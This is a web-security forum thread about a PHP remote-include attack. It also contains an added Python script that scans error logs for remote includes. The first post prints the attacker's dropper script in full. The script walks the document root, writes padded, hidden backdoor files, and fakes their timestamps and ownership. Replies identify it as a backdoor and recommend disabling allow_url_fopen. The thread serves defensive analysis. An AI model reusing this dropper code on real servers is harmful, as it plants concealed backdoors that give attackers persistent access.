namogofer.php hacking attempt

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

SpecialK
Forum Commoner
Posts: 96
Joined: Mon Sep 18, 2006 3:49 pm

namogofer.php hacking attempt

Post by SpecialK »

I have noticed this hacking attempt at one of our websites. It gives a weird error in the log (about 26k lines in 10 seconds) similar to this:

[client 196.28.230.50] [Time: Mon Mar 10 2008 15:50:38] PHP Notice: Undefined variable: CURFILE in http://www.elettrodataservice.it/foto_a ... aca/a/.php on line 101\n

What this seems to do is hit the website and then execute the script at this address. I have gone and manually denied anything from this IP, but it appears it spreads based on other sites. The code available at this link is below.

Code:

error_reporting(1);
 
global $HTTP_SERVER_VARS;
 
$START = time();
$WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);
 
function my_fwrite($f,$data) { 
  global $CURFILE; 
  $file_mtime = @filemtime($f); 
  $file_atime = @fileatime($f); 
  $dir_mtime = @filemtime(@dirname($f)); 
  $dir_atime = @fileatime(@dirname($f)); 
  if ($file_h = @fopen($f,"wb")){ 
    @fwrite($file_h,$data); 
    @fclose($file_h); 
    if ($file_mtime){ 
      @touch($f,$file_mtime,$file_atime); 
    }elseif(@filemtime($CURFILE)){ 
        @chmod($f,@fileperms($CURFILE)); 
        @touch($f,@filemtime($CURFILE),@fileatime($CURFILE));
        @chgrp($f,@filegroup($CURFILE));
        @chown($f,@fileowner($CURFILE));
    }; 
    if ($dir_mtime) 
      @touch(@dirname($f),$dir_mtime,$dir_atime); 
    return $f; 
  }else{ 
    return ''; 
  }; 
}; 
 
function ext($f){ 
  return substr($f, strrpos($f, ".") + 1); 
}; 
 
function walkdir($p,$func='_walkdir',$l=0){ 
  global $START; 
  global $WD_TIMEOUT; 
  global $FL; 
  $func_f = "{$func}_f"; 
  $func_d = "{$func}_d"; 
  $func_s = "{$func}_s"; 
  $func_e = "{$func}_e"; 
  if ($dh = @opendir("$p")){ 
    if (function_exists($func_s)) { 
      if ($func_s($p,$l)) 
        return 1; 
    }; 
    while ($f = @readdir($dh)){ 
      if (time() - $START >= $WD_TIMEOUT[$l] ) 
        break; 
      if ($f == '.' || $f == '..' ) 
        continue; 
      if (@is_dir ("$p$f/") ) 
        walkdir("$p$f/",$func,$l+1); 
      if (@is_dir ("$p$f/") && function_exists($func_d)) 
        $func_d("$p$f/",$l); 
      if (@is_file("$p$f" ) && function_exists($func_f)) 
        $func_f("$p$f" ,$l); 
    }; 
    closedir($dh); 
      
    if (function_exists($func_e)) 
      $func_e($p,$l); 
  }; 
}; 
  
function r_cut($p){ 
  global $R; 
  return substr($p,strlen($R)); 
};
 
function say($t) { 
  echo "$t\n"; 
}; 
 
function testdata($t) { 
  say(md5("testdata_$t")); 
};
 
$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT']; 
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME']; 
echo "<pre>"; 
testdata('start'); 
$fe = ext($CURFILE); 
if (!$fe) $fe = 'php'; 
$FN = "namogofer.$fe"; 
  
function _walkdir_s($d,$l) { 
  global $FCNT; 
  $FCNT = array('fn' => '','dir' => 0,'file' => 0,'simtype' => 0); 
}; 
  
function _walkdir_d($d,$l) { 
  global $FCNT; 
  $FCNT['dir' ]++; 
 
}; 
function _walkdir_f($f,$l) { global $FCNT; $FCNT['file']++; 
  if (ext($f) == ext($CURFILE)) $FCNT['simtype']++; }; 
 
function _walkdir_e($d,$l) { 
  global $C,$FCNT,$FN; 
  if ($C[$l]<7){ 
    if (my_fwrite("$d$FN",str_repeat("\n",100).str_repeat(' ',150).base64_decode('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').str_repeat(' ',150)."\n".str_repeat("\n",100))){
      $C[$l]++; 
      $FCNT['fn'] = r_cut("$d$FN"); 
      say(implode("\t",$FCNT)); 
    }; 
  }; 
}; 
 
walkdir("$R/"); 
testdata('end'); 
echo "</pre>";

Is there anything that you may have come across to best lock this down to prevent these attacks? It seems it tries to create these namogofer files and write them to execute something remotely. It can only write to stuff outside the web tree, so PHP isn't executable there without the command line, but I would like to secure the site as best as possible to prevent anything from going wrong because of this.

Checking other logs, it appears to be doing a POST to root directories, e.g. /var, /usr, etc.
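As an added defender-side example (not code from the thread or from the poster): a small Python scanner for PHP error-log lines in the shape quoted above. Any PHP notice or warning whose "in <file>" part is a URL means the interpreter executed code fetched over the network (the allow_url_fopen/allow_url_include path this thread ends up on), so the script flags those lines and tallies them by client IP and by remote host. The log lines, IPs and hostnames are constructed; only the CURFILE/namogofer pattern comes from the thread.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample log lines (IPs and hostnames are made up); same layout as the
# notice quoted in the post: [client IP] [Time: ...] PHP Level: message in file on line N
SAMPLE_LOG = """\
[client 203.0.113.7] [Time: Mon Mar 10 2008 15:50:38] PHP Notice: Undefined variable: CURFILE in http://attacker.example/foto/a/.php on line 101
[client 203.0.113.7] [Time: Mon Mar 10 2008 15:50:38] PHP Notice: Undefined variable: CURFILE in http://attacker.example/foto/a/.php on line 101
[client 198.51.100.9] [Time: Mon Mar 10 2008 15:50:40] PHP Notice: Undefined index: id in /var/www/html/index.php on line 12
[client 203.0.113.7] [Time: Mon Mar 10 2008 15:50:41] PHP Warning: fopen(/var/namogofer.php): failed to open stream in http://attacker.example/foto/a/.php on line 40
"""

LINE_RE = re.compile(
    r"\[client (?P<ip>[^\]]+)\] \[Time: (?P<time>[^\]]+)\] "
    r"PHP (?P<level>\w+):\s+(?P<msg>.*?) in (?P<file>\S+) on line (?P<line>\d+)"
)


def parse_line(line):
    """Split one PHP error-log line into its fields, or return None if it does not match."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None


def is_remote_include(entry):
    """True when the file PHP was executing is a URL, i.e. code was included from a remote host."""
    scheme = urlparse(entry["file"]).scheme.lower()
    return scheme in ("http", "https", "ftp", "ftps")


def scan(log_text):
    """Return (remote_hits, count_by_client_ip, count_by_remote_host) for the log text."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_remote_include(entry):
            entry["remote_host"] = urlparse(entry["file"]).netloc
            hits.append(entry)
    by_ip = Counter(h["ip"] for h in hits)
    by_host = Counter(h["remote_host"] for h in hits)
    return hits, by_ip, by_host


if __name__ == "__main__":
    hits, by_ip, by_host = scan(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["ip"], "->", h["file"])
    print("clients:", dict(by_ip))
    print("remote hosts:", dict(by_host))
```

On a real server, feed it the PHP error log and pair the remote hosts it reports with the access log at the same timestamps to find which local script performed the include.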
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: namogofer.php hacking attempt

Post by Mordred »

If you see that line in your logs, then the script must be executing. It is a poorly written backdooring attempt. (although well-executed as far as deployment of these things go: http://web.dtbaker.com.au/post/catching ... t_attempts)

The only (somewhat) good thing is that the backdoor is protected with a password, so even if you know the backdoor is there, only the attacker will be able to use the exploit. Or at least until someone catches the bot in a honeypot version of the backdoor and gets the password ;)

So, check which one of your scripts was used for the compromise and fix it.
SpecialK
Forum Commoner
Posts: 96
Joined: Mon Sep 18, 2006 3:49 pm

Re: namogofer.php hacking attempt

Post by SpecialK »

I don't seem to be able to track it to one script that could be executing this. The weird part is it's doing a POST, and any unsecured page uses a GET.

What I did track down, thanks to your link, is that allow_url_fopen is enabled (due to some other sites, we can't turn it off). The trick, it seems, is turning up security without breaking all the sites.
SpecialK
Forum Commoner
Posts: 96
Joined: Mon Sep 18, 2006 3:49 pm

Re: namogofer.php hacking attempt

Post by SpecialK »

It took some convincing, but a few old scripts were changed to use http_get instead of file_get_contents with a URL.

Turning allow_url_fopen off prevented the later attack attempts as they were rejected immediately.

For anyone else who searches this, changing file_get_contents as below worked perfectly for me.

$out = file_get_contents("http://website");
-----
$url = "http://website";
$out = http_parse_message(http_get($url))->body;


Thanks for your help.